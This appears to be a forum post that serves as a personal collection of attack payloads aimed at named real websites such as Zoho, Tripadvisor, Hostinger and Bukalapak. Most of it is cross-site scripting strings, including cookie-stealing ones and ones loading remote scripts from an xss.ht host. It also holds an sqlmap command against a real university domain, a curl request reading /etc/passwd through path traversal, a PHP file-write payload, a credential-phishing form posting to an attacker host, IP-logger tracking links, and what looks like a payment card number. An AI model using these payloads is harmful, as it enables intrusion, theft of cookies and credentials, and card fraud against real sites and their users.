1

Business

test
2key Communityff

2key Communityff

akoko

<iframe width="420" height="315" src="https://www.youtube.com/embed/REMY4W_XaHA#" onmouseover=alert(1)></iframe><video id="sampleMovie" src="HTML5Sample.mov" controls><img src=x onerror=alert(1)></video> 

{Rumahweb-clientzone}
<input type="image" src="d"onerror="confirm(document.cookie)">
<input type="image" src="d"onerror="onload(AKOKO)">​
"><img src=x onerror=prompt(document.domain)>
https://www.google.com/"onmouseover=javascript:prompt(1)"
"><svg/onload=alert(1)>

https://accounts.zoho.com/signin?servicename=ZohoHome&signupurl=https://www.zoho.com/signup.html

https://assist.zoho.com/login/redirect-page.jsp?serviceurl=/app

email html inject
"><img src=https://tinyurl.com/y6kcgtzs>"@x.y

Bbc.co.uk
<"";alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<img src=x onmouseover=javascript:alert(String.fromCharCode(88,83,83))>


cnn.com
</script>'<body><body onload=alert("XSS");>

python sqlmap.py -u "http://sepwww.stanford.edu/doku.php?do=search&id=test" --random-agent --dbms=mysql --dbs --tamper=space2comment --batch

hostinger
"><img src=x onerror=prompt(document.domain)>

hostinger.ro edit name
5232567055200197|07|2022|586

");</script><svg/onload=alert(document.domain)>

bukalapak xss search product
<img/src='#'/onerror=alert(1);>


Yeasir Arafat Namecheap support ticket
<a href=”javascript&colon;alert&lpar;document&period;domain&rpar;”>Click Here</a>

<iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”></iframe>


gdrive xss

"'><svg/onload=prompt(2)>"'<input onfocus="alert(1337)"autofocus>

'" '"> '"><svg/onload=prompt(1)> "> "><svg/onload=prompt(2)>""<input onfocus=alret(2)"autofocus


<font color=blue>hello</font>
<font color="blue" size=9px>Hello_Thellcia</font>

google Ads>
<test><img src=x onerror=alert(document.domain)>

<u><strong><font color=”blue” size=”8px”>H<strong><font color=”red” size=”8px”>E<strong><font color=”gold” size=”8px”>L<strong><font color=”blue” size=”8px”>L<strong><font color=”green” size=”8px”>O <strong><font color=”blue” size=”8px”>G <strong><font color=”red” size=”8px”>O <strong><font color=”gold” size=”8px”>O <strong><font color=”blue” size=”8px”>G <strong><font color=”green” size=”8px”>L <strong><font color=”red” size=”8px”>E
<img src=”https://www.sciencealert.com/images/2019-12/processed/CatsHaveFacialExpressionsButHardToRead_600.jpg" width=”600" height=”300">
<test><img src=x onerror=alert(document.domain)>

google merchandise
{{constructor.constructor(%27prompt(document.domain)%27)()}}

Evercross search
testbro"onclick="prompt(document.domain)

tripadvissor Xss upload image
"><iframe src="javascript:alert('1337');">.jpg

<? @fwrite(fopen('../akoko.txt','w'),hacked').phpinfo();?>

curl --url target -o "C:\AKOKO\akoko\passtxt"


curl --url pardisyazd.com/imgsize.php?img=/etc/passwd&w=0 -o "C:\AKOKO\akoko\passtxt"

'><svg/onload=alert(document.domain)><

"><img src=x onerror=alert()>


tripadvisor search 


X-Forwarded-Host: "</script>ssss<script>alert("XSS")</script>

buka nia ext addres
nslookup myip.opendns.com resolver1.opendns.com

python3 file_reading_server.py --external-addr 202.93.236.42 --port 8080

zoho calendar
<img src="x" onerror="alert(1);">
">input type="text" autofocus="true" onfocus="alert(1)">


iframe video

">iframe src=a onload=alert("pentest") < <a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>


media embeed
[<img src="x" onmouseover=alert(document.cookie);>]

Microsoft embed video 

<iframe width="420" height="315" src="https://www.youtube.com/embed/REMY4W_XaHA#" onmouseover=alert(1)></iframe><video id="sampleMovie" src="HTML5Sample.mov" controls><img src=x onerror=alert(1)></video> 

<iframe width="420" height="315" src="https://www.youtube.com/embed/REMY4W_XaHA#" onmouseover=alert(1)></iframe><video id="sampleMovie" src="HTML5Sample.mov" controls><img src=x onload=alert(1)></video> 

<iframe width="420" height="315" src="http://brutelogic.com.br/poc.svg"</iframe> 

<img src=”https://iplogger.org/3VQLM3” alt=””>

[Connect](https://www.connect.com) 

![Image alt text](https://iplogger.org/3VQLM3)

[Video-youtube] http://test/test#[url]onload=alert();//[/url]&amp;1=1[/video]

https://connect.zoho.com/#<img src=x onerror=alert('XSS')>

r">BODY%20ONLOAD=alert(1)>


<b>ONEPLUS</b><br><br><b>Enter Credential:<br><br><form action="http://attacker.site" method="GET"><input type="text" name="email" placeholder=Your Username"><br><input type="password" name="password"><br><input type="submit"></form>

"><script>$.getScript("//akokocraft.xss.ht")</script>

"><script src=https://akokocraft.xss.ht></script>

"><svg/onload=document.write(XSS)>
 
tumblr
<a href=""><script>alert(document.domain)</script>"Clisck</a>

Open external link

Author: robertonu
Published on: 10/09/2020 19:53 (edited on: 10/09/2020 20:01)

robertonu (0)
Member
None Reputation
0 Points
0 Activities